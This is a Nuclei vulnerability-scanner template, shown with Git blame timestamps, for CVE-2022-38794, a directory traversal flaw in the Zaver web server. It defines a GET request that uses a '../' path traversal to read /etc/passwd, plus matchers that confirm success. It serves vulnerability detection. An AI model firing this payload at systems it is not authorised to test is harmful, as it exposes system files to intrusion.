nuclei-templates/cves/2022/CVE-2022-38794.yaml

29 lines
667 B
YAML
Raw Normal View History

2022-08-28 20:35:50 +00:00
id: CVE-2022-38794
info:
name: Zaver - Local File Inclusion
author: pikpikcu
severity: high
description: |
Zaver through 2020-12-15 allows directory traversal via the GET /.. substring.
reference:
- https://github.com/zyearn/zaver/issues/22
2022-09-12 11:25:49 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38794
2022-08-28 20:35:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
tags: cve,cve2022,lfi,zaver
requests:
- method: GET
path:
- '{{BaseURL}}/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200